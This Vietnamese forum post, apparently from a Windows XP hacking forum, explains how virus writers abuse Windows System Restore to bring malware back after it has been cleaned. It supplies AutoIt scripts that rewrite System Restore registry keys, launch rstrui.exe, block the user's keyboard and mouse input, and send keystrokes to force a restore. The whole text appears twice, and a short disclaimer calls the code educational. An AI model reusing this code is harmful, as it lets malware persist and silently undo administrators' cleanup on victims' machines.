Khai thác cơ chế System Restore
Trang 1 trong tổng số 1 trang
Khai thác cơ chế System Restore
admin 25/3/2010, 12:22 pm
Hôm nay, tôi sẽ đề cập đến vấn đề System Restore của Windows. Vì người dùng bình thường ít ai sử dụng cơ chế này. Chỉ các nhà quản trị máy mới thường sử dụng tính năng này. Nên việc giao diện lúc running ít ai thấy qua. Do đó vx sẽ dễ qua mặt các tay mơ. Vì vậy vxer lợi dụng tính năng khôi phục lại hệ thống của Windows để tái sinh virus trở lại. Sau khi virus lây nhiễm xong, nó sẽ kích họat cơ chế System Restore của Windows hồng bắt Windows tự động backup chính virus đã lây nhiễm tùm lum. Đến một thời điểm thích hợp nó sẽ kích họat restore lại virus nguyên hình như lúc đầu . Đồng thời, một công hai chuyện, các nhà quản trị máy tưởng rằng restore lại đã an tòan, nhưng nào ngờ …. Vậy tính năng này bị khai thác thì nó cũng thành vô dụng. Khai thác system restore để virus càng lì lợm hơn.
Trước khi đọc tiếp code. Chúng ta nên đọc qua lọai bài viết này rất hay để nắm bắt cơ chế System Restore sử dụng ra sau:
Khôi phục hệ thống bằng System Restore trong Windows (1,2,3)
https://itprofes.forumvi.com/forum-f7/topic-t25.htm
https://itprofes.forumvi.com/forum-f7/topic-t26.htm
https://itprofes.forumvi.com/forum-f7/topic-t27.htm
Sau khi ta biết được System Restore phục hồi hệ thống như thế nào qua các lọai bài viết trên. Bây giờ chúng ta sẽ xem đọan code rất dễ hiểu viết bằng AutoIT:
1-/Automated System Restore:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr", "Start", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr", "ImagePath", "REG_EXPAND_SZ", "system32\DRIVERS\sr.sys")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr\Parameters", "FirstRun", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr", "Start", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr", "ImagePath", "REG_EXPAND_SZ", "system32\DRIVERS\sr.sys")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr\Parameters", "FirstRun", "REG_DWORD", "00000000")
RegWrite("HKEY_USERS\S-1-5-21-1482476501-1326574676-725345543-1003\SessionInformation", "ProgramCount", "REG_DWORD", "00000000")
Run ("C:\WINDOWS\system32\Restore\rstrui.exe")
sleep(10000)
$title = WinGetTitle("System Restore")
$wincheck = WinExists ($title)
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
sleep (50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
BlockInput (0)
endif
2-/Undo Restoreration
Run ("C:\WINDOWS\system32\Restore\rstrui.exe")
sleep(10000)
$title = WinGetTitle("System Restore")
$wincheck = WinExists ($title)
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
sleep (50)
send("{DOWN} ")
sleep(50)
send ("{DOWN}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
BlockInput (0)
Endif
Ghi chú:
- Các key trên do tôi tìm ra khi bật tắt cơ chế system restore
- Sau khi chạy xong script 1/ , thì Windows sẽ tự khởi động lại để restore hệ thống chứa trong thư mục System Volume Information\_restore{91AE3800-2FB4-462E-89FC-629813F3FC6C}. Vì vậy một vài bạn hỏi khi các trình anti-vx phát hiện vx trong thư mục trên thì phải diệt ra sao?. Qua bài này chắc các bạn sẽ biết làm gì rồi hé.
- Nếu chúng ta ko reg các key như trên thì khi kích họat system restore (rstrui.exe) sẽ bắt bạn phải setup một số thông số rất thủ công.
- Đọan code trên tôi chỉ thử trên WinXP. Nếu trên máy các bạn ko chạy ổn, thì các bạn xem code chỉnh sleep chút xíu nhé.
Lời Kết: Code trên đây chỉ có tính chất minh họa để học tập. Ko nên sử dụng để phá họai.
Trước khi đọc tiếp code. Chúng ta nên đọc qua lọai bài viết này rất hay để nắm bắt cơ chế System Restore sử dụng ra sau:
Khôi phục hệ thống bằng System Restore trong Windows (1,2,3)
https://itprofes.forumvi.com/forum-f7/topic-t25.htm
https://itprofes.forumvi.com/forum-f7/topic-t26.htm
https://itprofes.forumvi.com/forum-f7/topic-t27.htm
Sau khi ta biết được System Restore phục hồi hệ thống như thế nào qua các lọai bài viết trên. Bây giờ chúng ta sẽ xem đọan code rất dễ hiểu viết bằng AutoIT:
1-/Automated System Restore:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr", "Start", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr", "ImagePath", "REG_EXPAND_SZ", "system32\DRIVERS\sr.sys")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sr\Parameters", "FirstRun", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr", "Start", "REG_DWORD", "00000000")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr", "ImagePath", "REG_EXPAND_SZ", "system32\DRIVERS\sr.sys")
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr\Parameters", "FirstRun", "REG_DWORD", "00000000")
RegWrite("HKEY_USERS\S-1-5-21-1482476501-1326574676-725345543-1003\SessionInformation", "ProgramCount", "REG_DWORD", "00000000")
Run ("C:\WINDOWS\system32\Restore\rstrui.exe")
sleep(10000)
$title = WinGetTitle("System Restore")
$wincheck = WinExists ($title)
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
sleep (50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
BlockInput (0)
endif
2-/Undo Restoreration
Run ("C:\WINDOWS\system32\Restore\rstrui.exe")
sleep(10000)
$title = WinGetTitle("System Restore")
$wincheck = WinExists ($title)
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
sleep (50)
send("{DOWN} ")
sleep(50)
send ("{DOWN}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
sleep(50)
send("{ENTER} ")
sleep(50)
send ("{ENTER}")
BlockInput (0)
Endif
Ghi chú:
- Các key trên do tôi tìm ra khi bật tắt cơ chế system restore
- Sau khi chạy xong script 1/ , thì Windows sẽ tự khởi động lại để restore hệ thống chứa trong thư mục System Volume Information\_restore{91AE3800-2FB4-462E-89FC-629813F3FC6C}. Vì vậy một vài bạn hỏi khi các trình anti-vx phát hiện vx trong thư mục trên thì phải diệt ra sao?. Qua bài này chắc các bạn sẽ biết làm gì rồi hé.
- Nếu chúng ta ko reg các key như trên thì khi kích họat system restore (rstrui.exe) sẽ bắt bạn phải setup một số thông số rất thủ công.
- Đọan code trên tôi chỉ thử trên WinXP. Nếu trên máy các bạn ko chạy ổn, thì các bạn xem code chỉnh sleep chút xíu nhé.
Lời Kết: Code trên đây chỉ có tính chất minh họa để học tập. Ko nên sử dụng để phá họai.
admin- Thiếu Úy III
- Tổng số bài gửi : 627
Diem : 6547
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa -
Similar topics» Vx khai thác lỗi IE7 0-day
» Khai thác lỗi của DNS Server
» Khai thác lỗi tràn bộ đệm.
» Khai thác qua Hidden Input
» Metasploit - Công cụ khai thác lỗ hổng
» Khai thác lỗi của DNS Server
» Khai thác lỗi tràn bộ đệm.
» Khai thác qua Hidden Input
» Metasploit - Công cụ khai thác lỗ hổng
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
» xin tai lieu tieng viet
» Theo dõi tiến trình
» Giải pháp Bảo mật của Cisco
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Learn to hack !
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
» Ô Long Viên (Tập II)
» những ebook về hack tiếng việt cho người mới tìm hiểu.